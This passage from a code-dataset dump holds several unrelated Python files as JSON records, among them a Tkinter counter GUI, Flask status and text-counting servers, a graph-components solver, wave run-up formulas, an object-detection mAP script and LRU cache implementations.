\n # Create View frame\n self.__bottom = Frame(self.__win)\n \n # Create Model\n self.__counter = Counter()\n\n # Create, configure, and place Up/Down button controls in top frame(part of Controller)\n # Clicking Up button will invoke countUp() method\n self.__buttonUp = Button(self.__top, text = \"C O U N T U P !\", command = self.countUp)\n self.__buttonUp.pack(side = 'left')\n # Clicking Down button will invoke countDown() method\n self.__buttonDown = Button(self.__top, text = \"C O U N T D O W N !\", command = self.countDown)\n self.__buttonDown.pack(side = 'right')\n\n # Create, configure, and place Reset button control in middle frame (part of Controller)\n # Clicking Reset button will invoke reset() method\n self.__buttonReset = Button(self.__mid, text = \" RESET Counter \", command = self.reset)\n # Create, configure, and place prompt and entry box control in middle frame (part of Controller)\n # Typing a value in entry box and pressing on the keyboard will invoke set() method\n self.__prompt = Label(self.__mid, text = 'Set Counter: ')\n self.__entry = Entry(self.__mid, width = 7)\n self.__entry.bind('', self.set)\n\n self.__buttonReset.pack(side = 'left')\n self.__prompt.pack(side = 'left')\n self.__entry.pack(side = 'left')\n\n # Create, configure, and place IntVar and labels to display Model data in bottom frame (part of View)\n # Label output\n self.__label = Label(self.__bottom, text = 'Count = ')\n # Create IntVar to hold string representation of current value of counter\n self.__iVal = IntVar()\n self.__iVal.set(self.__counter.getValue())\n # Create label to display IntVar\n self.__value = Label(self.__bottom, textvariable = self.__iVal)\n\n self.__label.pack(side = 'left')\n self.__value.pack(side = 'right')\n\n # Place frames vertically from top to bottom\n self.__top.pack()\n self.__mid.pack()\n self.__bottom.pack()\n\n # Enter the Tkinter main loop\n mainloop()\n \n # countUp() - causes counter to be incremented and modifies StringVar (View) accordingly (mutator)\n def countUp(self):\n self.__counter.increment() # Note that the model takes care of its own 
state, here it is incrementing\n self.__iVal.set(self.__counter.getValue()) # Get the new value from the model and display it\n\n # countDown() - causes counter to be decremented and modifies StringVar (View) accordingly (mutator)\n def countDown(self):\n self.__counter.decrement() # Note that the model takes care of its own state, here it is decrementing\n self.__iVal.set(self.__counter.getValue()) # Get the new value from the model and display it\n\n # reset() - causes counter to be re-initialized and modifies StringVar (View) accordingly (mutator)\n def reset(self):\n self.__counter.reset() # Note that the model takes care of its own state, here it is re-initializing its state\n self.__iVal.set(self.__counter.getValue()) # Get the new value from the model and display it\n\n # set() - causes counter to be set to value entered into entry box and modifies IntVar (View) accordingly (mutator)\n # param: event - produced when user presses \n def set(self, event):\n newValue = int (self.__entry.get()) # Get value that was entered into entry box\n # Note that newValue is NOT named self.__newValue because it is a local variable, NOT an instance variable\n # ONLY instance variables (which must be initialized in the constructor) are to use the self.__ naming convention\n self.__counter.set(newValue) # Have the model use the value to modify itself\n self.__iVal.set(self.__counter.getValue()) # Get the new value from the model and display it\n self.__entry.delete(0, END) # Clear entry box\n \n# Create a CounterGUI object\nCounterGUI()\n","repo_name":"JaehoonKang/Computer_Science_110_Python","sub_path":"GUI_example/GuiCounterDemo.py","file_name":"GuiCounterDemo.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43920243421","text":"# Given two strings of characters, write a function that returns \n# wether or not two strings are permutations of eahother\n# Example 1: \"Hello\" and \"eHlol\" returns \"These are permutations of eachother\"\n# Example 2: \"Hello\" and \"eHlal\" returns \"These are not permutations\"\n\ndef permutationn(string1, string2):\n result = \"\"\n if len(string1) != len(string2):\n print(\"Different size\")\n\n else:\n for letter in string1:\n if letter in string2:\n string2 = string2.replace(letter, \"\", 1)\n continue\n else:\n result = \"These are not permutations\"\n print(\"Character \", letter, \" from string 1 not found in string 2\")\n break\n if result == \"\":\n print(\"These are permutations of eachother\")\n else:\n print(result)\n\nstring1 = \"Holo\"\nstring2 = \"Halo\"\npermutationn(string1, string2)\n","repo_name":"miniquinox/Coding-challenges","sub_path":"Dynatrace 1 - Hello Holel.py","file_name":"Dynatrace 1 - Hello Holel.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17121425174","text":"#!flask/bin/python\nfrom flask import Flask\nfrom flask import Response\n\nimport datetime, os, json\n\n# Get uptime for service\nstartTime = datetime.datetime.now()\ndef getUptime():\n\treturn str(datetime.datetime.now() - startTime)\n\n# Count number of requests to status\nstatusRequestCt = 0\n\ndef getStatusCounter():\n\tglobal statusRequestCt\n\tstatusRequestCt += 1\n\treturn statusRequestCt\n\n# Get the date/time of when the first request was made\n# Read file contents to first run timestamp. 
If does not find file (created when date called), create a new file with timestamp\ndirPath = os.path.dirname(os.path.abspath(__file__))\ndef getInitialStatusReqDateTime():\n\ttry:\n\t\treturn readInitialStatusRequestDateTime()\n\texcept:\n\t\treturn initializeHistoryFile()\n\n# Create a new file to hold record incase of service failure || restart. It is initialized with the total endpoint count and current server time\ndef initializeHistoryFile():\n\tinitialDateTime = datetime.datetime.now()\n\twith open(dirPath + '/history.json', 'w+') as output:\n\t\tjson.dump({'initialDateTime': str(initialDateTime), 'totalEndPointRequests': 0}, output)\n\t\treturn str(initialDateTime)\n\n# initializeHistoryFile()\n# Read data from history file stored with api\ndef readInitialStatusRequestDateTime():\n\twith open(dirPath + '/history.json') as file:\n\t\tdata = json.load(file)\n\t\treturn data['initialDateTime']\n\ndef updateTotalEndpoints():\n\twith open(dirPath + '/history.json', 'r+') as file:\n\t\tdata = json.load(file)\n\t\ttmp = data['totalEndPointRequests']\n\t\tdata['totalEndPointRequests'] = tmp + 1\n\t\tfile.seek(0)\n\t\tjson.dump(data, file)\n\t\treturn data['totalEndPointRequests']\n\n# updateTotalEndpoints()\n\napp = Flask(__name__)\n\n@app.route('/status')\ndef status():\n\n\tdata = {\n\t\t'serviceUptime': getUptime(),\n\t\t'serviceEndPointRequests': getStatusCounter(),\n\t\t'initialDateTime': getInitialStatusReqDateTime(),\n\t\t'totalEndPointRequests': updateTotalEndpoints()\n\t}\n\n\tresponse = Response(json.dumps(data), status=200, mimetype='application/json')\n\n\treturn response\n\napp.run(host='0.0.0.0', port=4000)","repo_name":"PatrickHauke/bomoda_engineering_test","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2466202769","text":"# O(|V| + |E|) time | O(|V|) space\n# (space time correct?)\ndef find_graph_components():\n input_graph = read_input()\n adj_list = construct_adjacency_list(input_graph)\n components = get_components(adj_list)\n write_output(components)\n\n\ndef get_components(adj_list):\n components = []\n visited = set()\n for vertex, neighbours in adj_list.items():\n if vertex in visited:\n continue\n component = [vertex]\n visited.add(vertex)\n for neighbour in neighbours:\n if neighbour not in visited:\n dfs(adj_list, visited, neighbour, component)\n components.append(component)\n return components\n\n\ndef dfs(adj_list, visited, vertex, component):\n visited.add(vertex)\n component.append(vertex)\n if vertex not in adj_list:\n return\n for neighbour in adj_list[vertex]:\n if neighbour not in visited:\n dfs(adj_list, visited, neighbour, component)\n\n\ndef read_input():\n with open(\"input.txt\") as input:\n lines = input.readlines()\n return lines\n\n\ndef construct_adjacency_list(input_graph):\n adj_list = {}\n params = input_graph[0].split()\n vertex_n, edges_n = int(params[0]), int(params[1])\n for i in range(vertex_n):\n adj_list[i + 1] = []\n for i in range(1, len(input_graph)):\n edge = input_graph[i].split()\n if len(edge) == 0:\n break\n vertex_from = int(edge[0])\n vertex_to = int(edge[1])\n adj_list[vertex_from].append(vertex_to)\n if vertex_from != vertex_to:\n adj_list[vertex_to].append(vertex_from)\n return adj_list\n\n\ndef write_output(components):\n with open('output.txt', 'w') as output:\n output.write(str(len(components)) + \"\\n\")\n for component in components:\n vertex_sequence = [str(vertex) for 
vertex in component]\n output.write(str(len(vertex_sequence)) + \"\\n\")\n output.write(\" \".join(vertex_sequence) + \"\\n\")\n\n\nfind_graph_components()\n","repo_name":"varvarakoshman/yandex_algorithms_workout_contest","sub_path":"graphs/dfs-related/SearchForComponents.py","file_name":"SearchForComponents.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25672284191","text":"# Wave run-up: \"old Delft formula\"\ndef wrun_up_old(wperiod, wheight, slope):\n import numpy as np \n import matplotlib.pyplot as plt\n dike_slope = 1 / slope\n wlength0 = 1.56 * wperiod**2\n wsteepness = wheight / wlength0\n \n wrunup_old = 8 * wheight * dike_slope\n \n print(f\"\\nWave run-up ('Old Delft' formula): {wrunup_old:.2f} (m)\\n\")\n fig, (a0, a1) = plt.subplots(1,2, figsize = (21, 5),\n gridspec_kw={'width_ratios': [1, 5]})\n a0.plot(wsteepness, wheight, 'h', color='gray',\n markersize=15, markerfacecolor='green',\n markeredgecolor='black', markeredgewidth=2)\n a0.set_xlim(0, 0.1)\n a0.set_ylim(0, 10)\n a0.set_xticks(np.linspace(0, 0.1, 6))\n a0.set_yticks(np.linspace(0, 10, 11))\n a0.set_xlabel('$H/L$ (-)')\n a0.set_ylabel('$H_s$ (m)')\n a0.grid()\n a1.plot(wrunup_old, wheight, 'd', color='blue',\n markersize=15, markerfacecolor='green',\n markeredgecolor='black', markeredgewidth=2)\n a1.set_xlim(0, 140)\n a1.set_ylim(0, 10)\n a1.set_xticks(np.linspace(0, 150, 31))\n a1.set_yticks(np.linspace(0, 10, 11))\n a1.set_xlabel('Wave Run-up: Old Delft Formula (m)')\n a1.set_ylabel('$H_s$ (m)')\n a1.grid()\n return\n\n# Wave run-up: CUR-TAW\ndef wrun_up_curtaw(wperiod, wheight, wangle, slope, slope_roughness, berm):\n import numpy as np \n import matplotlib.pyplot as plt\n # Library parameters\n dike_slope = 1 / slope\n # wave period and steepness\n wperiod_m10 = wperiod * 0.9\n wlength = 1.56 * wperiod_m10**2\n wsteepness = wheight / wlength\n # breaking parameter\n break_par = dike_slope / np.sqrt(wsteepness)\n # Slope roughness\n if slope_roughness == 1.0:\n print(\"Slope material: asphalt, concrete with a smooth surface.\")\n elif slope_roughness == 0.9:\n print(\"Slope material: concrete blocks, block mats.\")\n elif slope_roughness == 0.7:\n print(\"Slope material: gravel, gabions.\")\n elif slope_roughness == 0.6:\n print(\"Slope material: quarry stone (rip-rap).\")\n elif slope_roughness == 0.5:\n print(\"Slope material: cubes (random positioning).\")\n else:\n print(\"Slope material: X-blocs, tetrapods, dolosses.\")\n # Berm factor\n if berm == 0:\n berm_factor = 1\n print(f\"Dike has no berm --\\u2192 Berm fator = {berm_factor:.2f}\")\n else:\n berm_factor = 0.7\n print(f\"Dike has a berm --\\u2192 Berm fator = {berm_factor:.2f} \\\n(but it needs to accurately calculate)\")\n # Wave angle factor\n if wangle <= 80 and wangle >= 0:\n woblique = 1 - 0.0022 * wangle\n print(f\"Wave direction = {wangle:.2f}\\N{superscript zero} --\\u2192 \\\nOblique wave factor = {woblique:.4f}.\")\n else:\n woblique = 0.0824\n print(f\"Wave direction = {wangle:.2f}\\N{superscript zero} --\\u2192 \\\nOblique wave factor = {woblique:.4f}.\")\n # Calculations\n wrunup_curtaw = 1.75 * wheight * slope_roughness * berm_factor * woblique * break_par\n # Print results\n print(f\"Breaking parameter = {break_par:.2f}. 
\\\n\\nWavelength = {wlength:.2f} (m).\\\n\\nWave run-up (CUR-TAW equation) = {wrunup_curtaw:.3f} (m).\\n\")\n # Plot results\n fig, (a0, a1) = plt.subplots(1,2, figsize = (21, 5), \n gridspec_kw={'width_ratios': [1, 5]})\n a0.plot(wsteepness, wheight, 'h', color='gray',\n markersize=15, markerfacecolor='green',\n markeredgecolor='black', markeredgewidth=2)\n a0.set_xlim(0, 0.1)\n a0.set_ylim(0, 10)\n a0.set_xticks(np.linspace(0, 0.1, 6))\n a0.set_yticks(np.linspace(0, 10, 11))\n a0.set_xlabel('$H/L$ (-)')\n a0.set_ylabel('$H_s$ (m)')\n a0.grid()\n a1.plot(wrunup_curtaw, wheight, 'd', color='blue',\n markersize=15, markerfacecolor='green',\n markeredgecolor='black', markeredgewidth=2,\n label=\"Wave run-up (m)\")\n a1.set_xlim(0, 140)\n a1.set_ylim(0, 10)\n a1.set_xticks(np.linspace(0, 150, 31))\n a1.set_yticks(np.linspace(0, 10, 11))\n a1.set_xlabel('Wave Run-up: CUR-TAW Equation (m)')\n a1.set_ylabel('$H_s$ (m)')\n #a1.legend(loc='upper right', bbox_to_anchor=(0.90, 0.90))\n a1.grid()\n return","repo_name":"tungdaohunre/hydraulic-structure-1","sub_path":"def_wave_run_up.py","file_name":"def_wave_run_up.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4100162662","text":"\"\"\"Module that expose onetwotext server application\"\"\"\n\nfrom os.path import *\nfrom pathlib import Path\nfrom flask import *\nfrom flask_session import Session\nfrom waitress import serve\nfrom datetime import datetime, timedelta\nfrom sqlite3 import OperationalError\n\nfrom onetwotext.db_lib import *\nfrom onetwotext.utils import credential_check\nfrom onetwotext.word_calculator import *\n\n_APP = Flask(__name__)\n__WORK_DIR__ = dirname(__file__)\n\n\n@_APP.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n print(\n request.remote_addr,\n \" Connected to Server at \",\n datetime.now().strftime(\"%H:%M:%S on %d %b %Y\"),\n )\n\n return render_template(\"ott_login.html\")\n\n\n@_APP.route(\"/access_control\", methods=[\"GET\", \"POST\"])\ndef access_control():\n \"\"\"Route to control user credentials\"\"\"\n\n if request.method == \"POST\":\n username = (request.form[\"username\"]).strip().lower()\n password = request.form[\"password\"]\n\n try:\n user = get_user_data(username)\n except OperationalError as error:\n print(error)\n print(\"Try to create ott_users Table...\")\n create_db_and_default_user()\n user = get_user_data(username)\n\n if not user or not credential_check(user, password):\n return render_template(\n \"ott_login.html\",\n res=\"Wrong username or password.\",\n css=\"crash\",\n )\n else:\n import secrets\n\n token = secrets.token_hex(6)\n session[\"my_var\"] = token\n\n try:\n token\n except:\n token = session.get(\"my_var\", None)\n\n if token is not None:\n return redirect(url_for(\"onetwotext\"))\n else:\n abort(404)\n\n\n@_APP.route(\"/onetwotext\", methods=[\"GET\", \"POST\"])\ndef onetwotext():\n if session.get(\"my_var\", None):\n return render_template(\"onetwotext.html\")\n else:\n abort(404)\n\n\n@_APP.route(\"/count-text\", methods=[\"GET\", \"POST\"])\ndef count_text():\n if session.get(\"my_var\", None):\n text = (request.json.get(\"text\")).lower()\n response = python_count(text)\n return jsonify(response)\n else:\n abort(404)\n\n\n@_APP.route(\"/count-from-ai\", methods=[\"GET\", \"POST\"])\ndef count_from_ai():\n if session.get(\"my_var\", None):\n text = (request.json.get(\"text\")).lower()\n response = nn_completion_count(text)\n return jsonify(response)\n else:\n 
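# Added note, not in the original source: as in the other session-guarded routes of this module,\n        # a request without a valid session token falls through to a plain 404 here rather than an\n        # authentication-specific status code.\n        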
abort(404)\n\n\ndef start_server(host: str, port: str) -> None:\n \"\"\"Basic function to start onetwotext app as a server with users credentials\n and session handling\n\n Input:\n ------\n - host:str\n string variable to set exopsing host for server.\n - port:str\n string variable to set exopsing port for server.\n \"\"\"\n\n session_dir = Path(expanduser(\"~\")) / \"ott_server_sessions\"\n\n if not session_dir.exists():\n session_dir.mkdir(parents=True)\n\n _APP.secret_key = \"super secret key\"\n _APP.config[\"SESSION_TYPE\"] = \"filesystem\"\n _APP.config[\"SESSION_FILE_DIR\"] = session_dir\n _APP.config[\"PERMANENT_SESSION_LIFETIME\"] = timedelta(minutes=10)\n\n sess = Session()\n sess.init_app(_APP)\n\n serve(_APP, host=host, port=port)\n","repo_name":"RicDV/onetwotext","sub_path":"onetwotext/ott_app_sever.py","file_name":"ott_app_sever.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30038245464","text":"from multiprocessing import Process\nfrom time import sleep\nimport os\n\n\ndef task1(s, name):\n while True:\n sleep(s)\n print('任务一;;;;;;', os.getpid(), '----------', os.getppid(), name)\n\n\ndef task2(s, name):\n while True:\n sleep(s)\n print('任务二;;;;;', os.getpid(), '----------', os.getppid(), name)\n\n\nnumber = 1\nif __name__ == '__main__':\n # 子进程p p1\n print(os.getpid())\n p = Process(target=task1, name='任务1', args=(1, 'aa')) # arg是可迭代的对象传入函数中\n print(p)\n p.start()\n p1 = Process(target=task2, name='任务2', args=(2, 'bb'))\n print(p1)\n p1.start()\n\n while True: # 主进程\n number += 1\n sleep(0.2)\n if number==100:\n p.terminate()\n p1.terminate()\n break\n else:\n print('-------------number',number)\n# 在run当前.py文件的时候系统就已经开辟一个进程了 所以定义的p 和 p1都是子进程\n","repo_name":"Luciano0000/Pyhon-","sub_path":"multiprocessing/QianFeng029process2.py","file_name":"QianFeng029process2.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72107841287","text":"#!/bin/python\nimport time\nfrom flask import Flask, render_template, request\nimport json\nimport os\nfrom player import *\nfrom stream import StreamList\n\n\napp = Flask(__name__)\n#btooth=Bluetoothctl()\nplayer = Player()\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/get_paired_devices\")\ndef get_paired_devices():\n # paired_list = btooth.get_paired_devices()\n # return json.dumps(paired_list)\n return \"OK\"\n\n@app.route(\"/scan_available_devices\")\ndef scan_available_devices():\n return \"OK\"\n # available_devices_list = btooth.start_scan()\n # time.sleep(15)\n # print(available_devices_list)\n # return json.dumps(available_devices_list)\n\n@app.route(\"/add_stream\", methods=['POST'])\ndef add_stream():\n content = request.get_json();\n if content != None:\n StreamList().add_stream(content['name'], content['url'], content['genre'])\n return {\"result\" : \"success\"}, 200\n else:\n return {\"result\" : \"error\"}, 200\n\n@app.route(\"/play\", methods=['POST'])\ndef play():\n content = request.get_json();\n if content != None: \n print(content)\n player.play(content['url'])\n else:\n player.play(player.url)\n return {\"result\" : \"success\"}, 200\n\n@app.route(\"/remove\", methods=['POST'])\ndef remove_item():\n content = request.get_json();\n StreamList().remove_stream(content['url'])\n return {\"result\" : \"success\"}, 200\n\n@app.route(\"/stop\", methods=['POST'])\ndef 
stop_music():\n player.stop()\n return {\"result\" : \"success\"}, 200\n\n@app.route(\"/get_playlist\", methods=['GET'])\ndef get_playlist():\n print(\"Get playlist!\")\n return StreamList().get_list(), 200\n\n@app.route(\"/bluetooth_connect\")\ndef bluetooth_connect():\n print (\"Connecting to bluetooth speaker\")\n # btooth.connect(\"00:18:09:6A:2A:D5\")\n return \"OK\"\n\n@app.route(\"/current_playing\")\ndef current_playing():\n return '{\"status\" : \"'+ player.play_status +'\", \"station_name\" : \"'+ player.station_name + '\", \"current_track\" : \"' + player.current_track + '\"}', 200\n\n@app.route(\"/set_volume\", methods=['POST'])\ndef set_volume():\n content = request.get_json();\n player.volume = int(content['volume']);\n player.mute = bool(content['mute']);\n return {\"result\" : \"success\"}, 200\n\n\nif __name__ == \"__main__\":\n player.thread.start()\n app.run(host=\"0.0.0.0\", port=8080)\n \n","repo_name":"AlexandarDjordjevic/WebPlayer","sub_path":"web_app.py","file_name":"web_app.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"51068948006","text":"'''\r\nAn example for using BoundingBox class, plotting precision-recall curve, plotting BoundingBox objects on images, and\r\ncomputing PASCAL-VOC-style mAP (11-points-interpolation method and all-points-interpolation method).\r\n'''\r\n\r\nimport cv2\r\nimport os\r\nfrom lib import object_detection_evaluation as ode\r\nfrom lib import BoundingBox as bb\r\nimport numpy as np\r\nfrom lib import utils\r\n\r\n\r\nCV2_FONT = cv2.FONT_HERSHEY_SIMPLEX\r\n\r\n\r\n################################################################\r\n# Prepare for data (An example for using the BoundingBox class)#\r\n################################################################\r\nDATA_DIR = 'data/'\r\n\r\n# Three images used for evaluation\r\nimg_filename_list = os.listdir(DATA_DIR)\r\nimg_path_list = []\r\nfor filename in img_filename_list:\r\n img_path_list.append(os.path.join(DATA_DIR, filename))\r\n\r\n# Create ground truth bounding boxes and predicted bounding boxes for the images and store them in the lists\r\ngt_bb_list = []\r\npr_bb_list = []\r\n# Define the ground truth bounding box and the predicted bounding box for img1\r\nimg1_gt_bb1 = bb.BoundingBox(class_id='object', img_path='data/001.jpg', x1=72, y1=133, x2=881, y2=575, bb_type='gt')\r\nimg1_pr_bb1 = bb.BoundingBox(class_id='object', img_path='data/001.jpg', x1=60, y1=120, x2=850, y2=500, bb_type='pr', \\\r\n prediction_confidence=0.8)\r\ngt_bb_list.append(img1_gt_bb1)\r\npr_bb_list.append(img1_pr_bb1)\r\n# Define the ground truth bounding box and the predicted bounding box for img2\r\nimg2_gt_bb1 = bb.BoundingBox(class_id='object', img_path='data/002.jpg', x1=4, y1=160, x2=251, y2=313, bb_type='gt')\r\nimg2_gt_bb2 = bb.BoundingBox(class_id='object', img_path='data/002.jpg', x1=294, y1=10, x2=458, y2=309, bb_type='gt')\r\nimg2_pr_bb1 = bb.BoundingBox(class_id='object', img_path='data/002.jpg', x1=98, y1=134, x2=318, y2=317, bb_type='pr', \\\r\n prediction_confidence=0.77)\r\ngt_bb_list.append(img2_gt_bb1)\r\ngt_bb_list.append(img2_gt_bb2)\r\npr_bb_list.append(img2_pr_bb1)\r\n# Define the ground truth bounding box and the predicted bounding box for img3\r\nimg3 = cv2.imread('data/003.jpg')\r\nimg3_height, img3_width = img3.shape[:2]\r\nimg3_gt_bb1 = bb.BoundingBox(class_id='object', img_path='data/003.jpg', x1=26, y1=23, x2=317, y2=img3_height-1,\r\n bb_type='gt')\r\nimg3_gt_bb2 
= bb.BoundingBox(class_id='object', img_path='data/003.jpg', x1=258, y1=0, x2=575, y2=396, bb_type='gt')\r\nimg3_pr_bb1 = bb.BoundingBox(class_id='object', img_path='data/003.jpg', x1=10, y1=10, x2=210, y2=310, bb_type='pr', \\\r\n prediction_confidence=0.70)\r\nimg3_pr_bb2 = bb.BoundingBox(class_id='object', img_path='data/003.jpg', x1=266, y1=47, x2=580, y2=329, bb_type='pr', \\\r\n prediction_confidence=0.66)\r\ngt_bb_list.append(img3_gt_bb1)\r\ngt_bb_list.append(img3_gt_bb2)\r\npr_bb_list.append(img3_pr_bb1)\r\npr_bb_list.append(img3_pr_bb2)\r\n# Define the ground truth bounding box and the predicted bounding box for img4\r\nimg4_gt_bb1 = bb.BoundingBox(class_id='object', img_path='data/004.jpg', x1=52, y1=77, x2=252, y2=184, bb_type='gt')\r\nimg4_gt_bb2 = bb.BoundingBox(class_id='object', img_path='data/004.jpg', x1=266, y1=87, x2=410, y2=187, bb_type='gt')\r\nimg4_pr_bb1 = bb.BoundingBox(class_id='object', img_path='data/004.jpg', x1=30, y1=60, x2=106, y2=104, bb_type='pr', \\\r\n prediction_confidence=0.53)\r\nimg4_pr_bb2 = bb.BoundingBox(class_id='object', img_path='data/004.jpg', x1=210, y1=72, x2=410, y2=194, bb_type='pr', \\\r\n prediction_confidence=0.59)\r\nimg4_pr_bb3 = bb.BoundingBox(class_id='object', img_path='data/004.jpg', x1=390, y1=160, x2=420, y2=190, bb_type='pr', \\\r\n prediction_confidence=0.40)\r\ngt_bb_list.append(img4_gt_bb1)\r\ngt_bb_list.append(img4_gt_bb2)\r\npr_bb_list.append(img4_pr_bb1)\r\npr_bb_list.append(img4_pr_bb2)\r\npr_bb_list.append(img4_pr_bb3)\r\n# Define the ground truth bounding box and the predicted bounding box for img5\r\nimg5_gt_bb1 = bb.BoundingBox(class_id='object', img_path='data/005.jpg', x1=1, y1=127, x2=266, y2=473, bb_type='gt')\r\nimg5_gt_bb2 = bb.BoundingBox(class_id='object', img_path='data/005.jpg', x1=209, y1=96, x2=472, y2=396, bb_type='gt')\r\nimg5_pr_bb1 = bb.BoundingBox(class_id='object', img_path='data/005.jpg', x1=6, y1=115, x2=277, y2=475, bb_type='pr', \\\r\n prediction_confidence=0.97)\r\nimg5_pr_bb2 = bb.BoundingBox(class_id='object', img_path='data/005.jpg', x1=180, y1=300, x2=470, y2=390, bb_type='pr', \\\r\n prediction_confidence=0.61)\r\ngt_bb_list.append(img5_gt_bb1)\r\ngt_bb_list.append(img5_gt_bb2)\r\npr_bb_list.append(img5_pr_bb1)\r\npr_bb_list.append(img5_pr_bb2)\r\n\r\n\r\n###################################################################################################################\r\n# Test evaluation methods (plot precision-recall curve, compute mAP by the 11-points-interpolation method and the #\r\n# all-points-interpolation method of the PASCAL VOC) #\r\n###################################################################################################################\r\n# Get the dictionary list for evaluated predicted bounding boxes, whose item contains a predicted bounding box and a\r\npr_bb_dict_list = ode.eval_predicted_bb_list(gt_bb_list, pr_bb_list)\r\nclass_id_list = list(set([bb_dict['bb'].get_class_id() for bb_dict in pr_bb_dict_list]))\r\nap_by_11_points_list = []\r\nap_by_all_points_list = []\r\n\r\nfor class_id in class_id_list:\r\n class_pr_bb_dict_list = \\\r\n [pr_bb_dict for pr_bb_dict in pr_bb_dict_list if pr_bb_dict['bb'].get_class_id() == class_id]\r\n class_gt_bb_list = [gt_bb for gt_bb in gt_bb_list if gt_bb.get_class_id() == class_id]\r\n acc_precision_recall_dict_list = \\\r\n ode.draw_precision_recall_curve(class_pr_bb_dict_list, len(class_gt_bb_list), plot=True)\r\n ap_by_11_points = ode.get_ap_by_11_points_interpolation(acc_precision_recall_dict_list)\r\n 
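# Added note, not from the original script: per the module docstring these are PASCAL-VOC-style APs.\r\n    # The 11-point method averages interpolated precision at recalls 0.0, 0.1, ..., 1.0, while the\r\n    # all-points method integrates the full precision-recall curve; the per-class APs collected\r\n    # below are averaged into map_by_11_points and map_by_all_points after this loop.\r\n    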
ap_by_11_points_list.append(ap_by_11_points)\r\n ap_by_all_points = ode.get_ap_by_all_points_interpolation(acc_precision_recall_dict_list)\r\n ap_by_all_points_list.append(ap_by_all_points)\r\n\r\nmap_by_11_points = np.mean(ap_by_11_points_list)\r\nmap_by_all_points = np.mean(ap_by_all_points_list)\r\n\r\nprint('The mAP calculated by the 11-points-interpolation method of PASCAL VOC is: ', map_by_11_points)\r\nprint('The mAP calculated by the 11-points-interpolation method of PASCAL VOC is: ', map_by_all_points)\r\n\r\n\r\n############################################################\r\n# An example for Visualizing images with corresponding bbs #\r\n############################################################\r\n# for img_path in img_path_list:\r\n# img_gt_bb_list = [gt_bb for gt_bb in gt_bb_list if gt_bb.get_img_path() == img_path]\r\n# # img_pr_bb_list = [pr_bb for pr_bb in pr_bb_list if pr_bb.get_img_path() == img_path]\r\n# img_pr_bb_dict_list = [pr_bb_dict for pr_bb_dict in pr_bb_dict_list if pr_bb_dict['bb'].get_img_path() == img_path]\r\n# img_with_bbs = cv2.imread(img_path)\r\n# for img_gt_bb in img_gt_bb_list:\r\n# utils.draw_bb_on_img(img_gt_bb, img_with_bbs)\r\n# for img_pr_bb_dict in img_pr_bb_dict_list:\r\n# utils.draw_bb_on_img(img_pr_bb_dict['bb'], img_with_bbs)\r\n# upper_left_corner = img_pr_bb_dict['bb'].get_upper_left_corner()\r\n# cv2.putText(img_with_bbs, str(img_pr_bb_dict['TP']), upper_left_corner, CV2_FONT, 0.5, \\\r\n# (0, 0, 0), 1, cv2.LINE_AA)\r\n# cv2.imshow(img_path, img_with_bbs)\r\n\r\n\r\ncv2.waitKey(0)\r\n\r\n\r\n","repo_name":"neoxu314/2D-Computer-Vision-Metrics","sub_path":"example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"75331321287","text":"# Video link: https://youtu.be/3ocyjP7gnHY\n# Method 1: using doubly linked list + dictionary\n\nclass Node:\n def __init__(self, key=None, value=None):\n self.key = key\n self.value = value\n self.prev = None\n self.next = None\nclass LRUCache:\n def __init__(self, capacity):\n self.capacity = capacity\n self.dic = {} # {key : node}\n self.head = self.tail = Node() #dummy nodes\n self.head.next = self.tail\n self.tail.prev = self.head\n def get(self, key):\n if key not in self.dic:\n return -1\n else:\n node = self.dic[key]\n self.evict(node)\n self.insertToEnd(node)\n return node.value\n def put(self, key, value):\n if key in self.dic:\n self.dic[key].value = value\n node = self.dic[key]\n self.evict(node)\n self.insertToEnd(node)\n else:\n if len(self.dic)==self.capacity:\n # delete lru least recently used node in dictionary and in list. 
order does not matter because we've saved that node in a variable (lru_node references that node, so it won't be lost in this block; it will be lost once we are out of the block)\n                # if we do not save self.head.next to a new reference, we need to delete it in dic first then in list; otherwise, when we say del self.dic[self.head.next], the key is the second node's key\n                lru_node = self.head.next\n                del self.dic[lru_node.key]\n                self.evict(lru_node)\n\n            newNode = Node(key, value)\n            self.insertToEnd(newNode)\n            self.dic[key] = newNode\n\n    def evict(self, node):\n        node.prev.next = node.next\n        node.next.prev = node.prev\n\n    def insertToEnd(self, node):\n        last_node = self.tail.prev # tail is dummy node, last_node is the most recently used node\n        node.prev = last_node\n        node.next = self.tail\n        self.tail.prev = node\n        last_node.next = node\n\n# Method 2: using OrderedDict\n\nfrom collections import OrderedDict\nclass LRUCache:\n\n    def __init__(self, capacity: int):\n        self.capacity = capacity\n        self.dic = OrderedDict()\n        \n\n    def get(self, key: int) -> int:\n        if key not in self.dic:\n            return -1\n        else:\n            self.dic.move_to_end(key)\n            return self.dic[key]\n        \n\n    def put(self, key: int, value: int) -> None:\n        if key in self.dic:\n            self.dic[key] = value\n            self.dic.move_to_end(key)\n        else:\n            if self.capacity == len(self.dic):\n                self.dic.popitem(last = False) # throw away the first in queue\n            self.dic[key] = 